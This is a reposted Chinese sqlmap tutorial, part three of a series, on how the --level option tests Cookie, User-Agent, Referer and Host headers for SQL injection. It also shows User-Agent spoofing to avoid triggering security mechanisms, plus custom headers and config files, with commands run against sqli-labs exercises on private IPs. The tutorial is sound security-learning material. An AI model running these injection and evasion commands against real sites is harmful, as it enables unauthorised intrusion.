码上快乐

相关内容   简体   繁体

sqlmap学习(三)设置请求参数

本文转载自  查看原文  2020-03-23 15:41  1520    sqlmap学习

--level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数。当--level参数设定为3或者3以上的时候,会尝试对User-Angent和referer进行注入。

1、sqlmap设置User-Agent头

--user-agent=AGENT指定HTTP User - Agent头
默认情况下sqlmap的HTTP请求头中User-Agent值是:sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)
可以使用--user-agent来伪造
使用Firefox浏览器访问页面时的User-Agent
在这里插入图片描述
使用python sqlmap.py -u "http://172.17.0.1/Less-1/index.php/?id=1" --banner并用wireshark抓取http包,查看User-Agent
在这里插入图片描述
为了避免触发安全机制,使用参数设置User-Agent

python sqlmap.py -u "http://172.17.0.1/Less-1/index.php/?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --banner

此时可以看到User-Agent头改变
在这里插入图片描述
也可以使用--random-agent使用随机选定的HTTP User - Agent头

python sqlmap.py -u "http://172.17.0.1/Less-1/index.php/?id=1" --random-agent

在这里插入图片描述
查看可使用的User - Agent

root@rane:/usr/share/sqlmap# ls
COMMITMENT  data  doc  extra  http.txt  lib  LICENSE  plugins  README.md  sqlmapapi.py  sqlmap.conf  sqlmap.py  tamper  test  test.txt  thirdparty  url.txt  wget-log
root@rane:/usr/share/sqlmap# cd data
root@rane:/usr/share/sqlmap/data# ls
html  procs  shell  txt  udf  xml
root@rane:/usr/share/sqlmap/data# cd txt
root@rane:/usr/share/sqlmap/data/txt# ls
common-columns.txt  common-files.txt  common-outputs.txt  common-tables.txt  keywords.txt  smalldict.txt  user-agents.txt  wordlist.tx_

可以在user-agents.txt中查看可使用的User - Agent
注意:针对User - Agent的值探测SQL注入,需要设置 --level值为3
以Less-18为例
在这里插入图片描述
开启burpsuite进行截断,将请求放入test.txt中
在这里插入图片描述
使用sqlmap进行自动化探测

python sqlmap.py -r test.txt --level 3

在这里插入图片描述
如果使用python sqlmap.py -r test.txt不加--level 3,则不会对User - Agent进行探测

2、sqlmap设置host头

对HTTP主机头进行SQL注入,需要设置--level为5

3、sqlmap设置referer头

以Less19为例
在这里插入图片描述
如果直接使用python sqlmap.py -r test.txt会提示
在这里插入图片描述
当设置level参数时

python sqlmap.py -r test.txt --level 3

在这里插入图片描述

4、sqlmap设置额外http头

方式一:
通过设置选项--headers,可以提供额外的HTTP头,每个头必须用换行符分割

python sqlmap.py -u "http://192.168.126.130/Less-1/index.php/?id=1" --headers="Accept-Language: fr\nETag: 123"

在这里插入图片描述
可以看到设置成功
设置多个时,使用分隔符'\n'

python sqlmap.py -u "http://192.168.126.130/Less-1/index.php/?id=1" --headers="Accept-Language: fr\nETag: 123\nCookie:123"

在这里插入图片描述
方式二:
从sqlmap.conf文件中设置

root@rane:/usr/share/sqlmap# ls
COMMITMENT  data  doc  extra  http.txt  lib  LICENSE  plugins  README.md  sqlmapapi.py  sqlmap.conf  sqlmap.py  tamper  test.txt  thirdparty  url.txt  wget-log
root@rane:/usr/share/sqlmap# cat sqlmap.conf
# At least one of these options has to be specified to set the source to
# get target URLs from.
[Target]
...

修改完sqlmap.conf后使用

python sqlmap.py -c sqlmap.conf


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 sqlmap学习(四)设置请求参数 sqlmap参数设置 SqlMap常用参数(一) sqlmap常用参数详解 sqlmap参数详解 sqlmap参数大全 sqlmap参数介绍 HTTP 请求/响应 设置/获取 Header参数 springboot的POST请求参数形式设置问题 学习@RequestBody注解解析请求参数流程
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM